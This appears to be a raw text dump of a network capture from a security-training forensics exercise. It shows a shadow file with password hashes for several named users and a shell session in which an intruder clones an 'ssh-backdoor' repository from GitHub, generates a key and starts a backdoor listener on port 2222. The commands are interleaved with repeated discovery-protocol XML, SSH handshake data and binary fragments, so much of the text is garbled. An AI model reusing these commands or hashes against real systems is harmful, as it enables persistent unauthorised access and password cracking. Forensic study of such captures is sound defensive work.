news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor
<git clone https://github.com/NinjaJc01/ssh-backdoor
Cloning into 'ssh-backdoor'...
remote: Enumerating objects: 18, done.        
remote: Counting objects:   5% (1/18)        
Unpacking objects:   5% (1/18)   
Unpacking objects:  11% (2/18)   
Unpacking objects:  16% (3/18)   
Unpacking objects:  22% (4/18)   
Unpacking objects:  27% (5/18)   
Unpacking objects:  33% (6/18)   
Unpacking objects:  38% (7/18)   
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>#Ro>
N+7,
PF_q
%Z.f)
rmO{
PP!"
mNvW
)Jo!
(0-g
N.4t
AOfty
VI~d
        +qE
Eremote: Total 18 (delta 4), reused 7 (delta 1), pack-reused 0        
Unpacking objects:  44% (8/18)   
Unpacking objects:  50% (9/18)   
Unpacking objects:  55% (10/18)   
Unpacking objects:  61% (11/18)   
Unpacking objects:  66% (12/18)   
Unpacking objects:  72% (13/18)   
Unpacking objects:  77% (14/18)   
Unpacking objects:  83% (15/18)   
Unpacking objects:  88% (16/18)   
Unpacking objects:  94% (17/18)   
Unpacking objects: 100% (18/18)   
Unpacking objects: 100% (18/18), done.
james@overpass-production:~$ <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>cd ssh-backdoor
cd ssh-backdoor
james@overpass-production:~/ssh-backdoor$ <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/james/.ssh/id_rsa): id_rsa
id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58 james@overpass-production
The key's randomart image is:
+---[RSA 2048]----+
|        .. .     |
|       .  +      |
|      o   .=.    |
|     . o  o+.    |
|      + S +.     |
|     =.o %.      |
|    ..*.% =.     |
|    .+.X+*.+     |
|   .oo=++=Eo.    |
+----[SHA256]-----+
james@overpass-production:~/ssh-backdoor$ chmod +x backdoor
chmod +x backdoor
james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
SSH - 2020/07/21 20:36:56 Started SSH backdoor on 0.0.0.0:2222
SSH-2.0-OpenSSH_8.2p1 Debian-4
SSH-2.0-OpenSSH_8.2p1 Debian-4
qcurve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1
ssh-rsa
Uaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
Uaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96
Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96
none
none
cZHD
curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c
rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-256,ssh-rsa,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com,ssh-ed25519,sk-ssh-ed25519@openssh.com
lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
none,zlib@openssh.com,zlib
none,zlib@openssh.com,zlib
ssh-rsa
w(-z
^%B|
^f& 
c|#P
 q&{
ssh-rsa
IFw1
?NK2
@Y!!
SSH-2.0-OpenSSH_8.2p1 Debian-4
SSH-2.0-OpenSSH_8.2p1 Debian-4
qcurve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1
ssh-rsa
Uaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
Uaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96
Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96
none
none
curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c
ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com,ssh-ed25519,sk-ssh-ed25519@openssh.com,rsa-sha2-512,rsa-sha2-256,ssh-rsa
lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
